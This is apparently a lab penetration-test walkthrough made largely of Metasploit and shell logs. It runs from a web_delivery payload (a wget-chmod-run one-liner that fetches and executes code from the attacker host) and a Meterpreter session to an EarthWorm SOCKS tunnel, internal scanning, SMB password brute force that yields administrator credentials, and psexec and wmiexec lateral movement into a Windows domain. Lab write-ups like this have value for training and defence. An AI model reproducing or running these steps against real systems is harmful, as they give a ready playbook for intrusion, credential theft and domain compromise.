msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21     web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) >


[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 12342

2. Entering meterpreter

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)

msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: firefart
meterpreter >

3. Adding the internal route

meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)

msf6 exploit(multi/script/web_delivery) >
msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4
[*] Route already exists
msf6 exploit(multi/script/web_delivery) >
# destination network 192.168.93.0, netmask 255.255.255.0, next hop session 4

4. SOCKS5 proxy

All of the listener and routing work above was done inside msfconsole. A route added there only brings msfconsole itself into the internal network; to bring the attack machine's other tools in as well, a SOCKS proxy has to be set up. Here EarthWorm is used to build a reverse SOCKS5 proxy.

1. EarthWorm tunnelling tool

./ew_for_linux64 -s rcsocks -l 9898 -e 6767
# forward the local data received on port 9898 to port 6767 on the web server
# i.e. local traffic leaves through port 9898
# rcsocks / rssocks are used for reverse connections
# ssocks is used for forward connections
# -l  local port to listen on
# -e  port on the machine to connect back to
# -d  IP of the machine to connect back to
# -f  IP of the machine to actively connect to
# -g  port of the machine to actively connect to
# -t  timeout, default 1000

^C[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27--  http://192.168.1.25:8080/ew_for_linux64
正在连接 192.168.1.25:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:28080 (27K) [application/octet-stream]
正在保存至: “ew_for_linux64”

100%[================================================================================================================================================================================================================>] 28,080      --.-K/s   in 0.001s

2019-10-07 13:22:27 (34.7 MB/s) - 已保存 “ew_for_linux64” [28080/28080])

[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]#

┌──(root㉿ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!

[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server

2. Configuring proxychains4.conf
┌──(root㉿ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
#               socks5  192.168.67.78   1080    lamer   secret
#       proxy types: http, socks4, socks5, raw
#socks5         127.0.0.1 2222
#socks5   116.211.207.100 8080
socks5          127.0.0.1 9898

The socks5 entry points at port 9898; port 9898 forwards local traffic to port 6767, and port 6767 carries it into the internal network. From then on proxychains can route our tools into the internal network.

5. Internal host discovery

1. First module

msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show options

Module options (auxiliary/scanner/discovery/udp_probe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >

msf6 auxiliary(scanner/discovery/udp_probe) > run[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned  26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Three internal hosts were found:
192.168.93.10
192.168.93.20
192.168.93.30

2、Second module (smb_version)
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run
[-] 192.168.93.0:445      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139      - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:445      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139      - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139      - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:139      - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139      - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139      - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445     - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)
[+] 192.168.93.10:445     -   Host is running Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139      - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139      - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139      - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139      - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139     - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139     - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139     - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139     - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139     - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)
[+] 192.168.93.20:445     -   Host is running Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139     - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139     - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139     - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139     - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139     - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139     - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139     - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139     - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139     - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255:     - Scanned  26 of 256 hosts (10% complete)
[-] 192.168.93.26:445     - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)
[+] 192.168.93.30:445     -   Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)

Again the same three internal hosts, now with host names and the domain they belong to:
192.168.93.10    name:WIN-8GA56TNV3MV  domain:TEST
192.168.93.20    name:WIN2008          domain:TEST
192.168.93.30    name:WIN7             domain:TEST

6、Internal network attack

1、Password brute force
Use the auxiliary/scanner/smb/smb_login module to brute-force the SMB passwords of 192.168.93.10/20/30.

msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445     - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >

This error occurs because no password wordlist has been loaded yet.

msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445     - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445     - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445     - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator

msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.20:445     - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445     - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445     - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445     - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.10:445     - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445     - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445     - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445     - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445     - Caught interrupt from the console...
[*] Auxiliary module execution completed
192.168.93.30  administrator:123qwe!ASD
192.168.93.20  administrator:123qwe!ASD  
192.168.93.10  administrator:zxcASDqw123!!

With that we have the Administrator password of every internal host.

2、psexec tool
Use the psexec module to attack the internal hosts with the recovered credentials.

Attack flow for 192.168.93.30

msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.93.30    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               123qwe!ASD       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator    no        The username to authenticate as

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.93.30    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.30:445 - Connecting to the server...
[*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'...
[*] 192.168.93.30:445 - Selecting PowerShell target
[*] 192.168.93.30:445 - Executing the payload...
[+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.30:4444
[*] Sending stage (200774 bytes) to 192.168.93.30
[*] Meterpreter session 5 opened (192.168.93.100:34678 -> 192.168.93.30:4444 via session 4) at 2023-12-04 10:28:38 +0800
meterpreter >

Locate the domain controller

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
[+] Domain Controller: WIN-8GA56TNV3MV.test.org (IP: 192.168.93.10)
meterpreter >

The domain controller is 192.168.93.10.

Information gathering

meterpreter > shell
Process 1228 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win7
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 3C-55-76-DC-AB-F6
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-E0-74-2B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::fcc9:1e77:245c:9cf3%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.30(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-53-70-00-0C-29-E0-74-2B
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{9155D380-FF00-44EB-AE88-938EA5D2CAB2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{A0E4F0B0-B72B-4DC5-8935-EA51628015E2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest
3、wmiexec.py
wmiexec.py is a tool for executing WMI (Windows Management Instrumentation) commands and scripts on Windows. WMI is part of the Windows management architecture and can be used to manage and monitor system resources and services on local and remote computers. wmiexec.py lets a user run WMI commands and scripts from the command line and talk to a remote computer over DCOM/SMB; it is commonly used for system administration, troubleshooting and remote task execution.

Attack flow for 192.168.93.20

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains4 python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:445  ...  OK
[*] SMBv2.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.20:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : win2008
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
